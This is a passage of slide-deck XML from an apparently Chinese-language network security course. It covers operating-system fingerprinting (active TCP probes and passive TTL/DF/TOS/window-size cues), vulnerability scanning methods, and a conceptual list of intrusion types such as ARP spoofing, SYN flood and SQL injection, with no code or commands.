              <a:t>独有特性，被称为“指纹”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过这些细微的差别，可准确定位操作系统版本。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作系统识别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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3432641652"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常用的手段：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>顺序检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># SYN|FIN|URG|PSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项），针对开放端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项），针对封闭端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项），针对封闭端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># SYN|FIN|URG|PSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（包含若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项），针对封闭端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包，针对封闭端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20482" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主动协议栈指纹识别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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2613787088"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被动监测网络通信确定操作系统。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同操作系统对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数有不同默认设置：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>time to live</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don't Fragment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>type of service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窗口大小</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缺点：可靠性比主动协议栈识别差</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21506" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被动协议栈指纹识别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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2580814800"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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rrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统鉴别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>堆栈指纹技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="155651" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286451330"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="124271" y="1332309"/>
          <a:ext cx="8912225" cy="5553075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s649456" name="Visio" r:id="rId3" imgW="7694232" imgH="4514639" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="7694232" imgH="4514639" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 13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71" y="1332309"/>
                        <a:ext cx="8912225" cy="5553075"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="4E91D4"/>
                      </a:solidFill>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155652"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91BB54-0749-4368-96A1-017B3210149F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRP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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291517621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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据目标主机开放的应用和服务来扫描和判断是否存在或可能存在某些漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>意义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行网络安全评估</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为网络系统的加固提供依据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被网络攻击者加以利用来获取重要的数据信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162818" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162820"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2821"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CA04C08-8B1D-4384-B858-D36CB3E374A6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162822" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2581804" y="4176979"/>
            <a:ext cx="6221413" cy="267765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2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息系统安全性不在于是否采用了最新的加密算法或最先进的设备，而是由系统本身脆弱性，即漏洞决定。只要漏洞被发现，系统就有可能成为网络攻击的牺牲品。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162823" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179513" y="5229200"/>
            <a:ext cx="2106488" cy="10156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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木桶理论</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246726201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漏洞库匹配方法 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模拟黑客攻击手法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描方法</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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3904818382"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>针对配置错误的攻击－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>针对应用漏洞的攻击－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存溢出攻击－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>idq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存溢出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>电子欺骗攻击－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝服务攻击－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> flood</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>针对弱口令的攻击－口令破解</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用服务的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本地输入法漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用应用脚本开发的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用人的心理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>社会工程学攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135170" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>多种多样的入侵方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135172" name="灯片编号占位符 3"/>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5C0414B-2E08-4868-B311-59C7F4B7E4E6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135173" name="日期占位符 4"/>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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14478254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dirty="0"/>
              <a:t>网络设备漏洞扫描器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
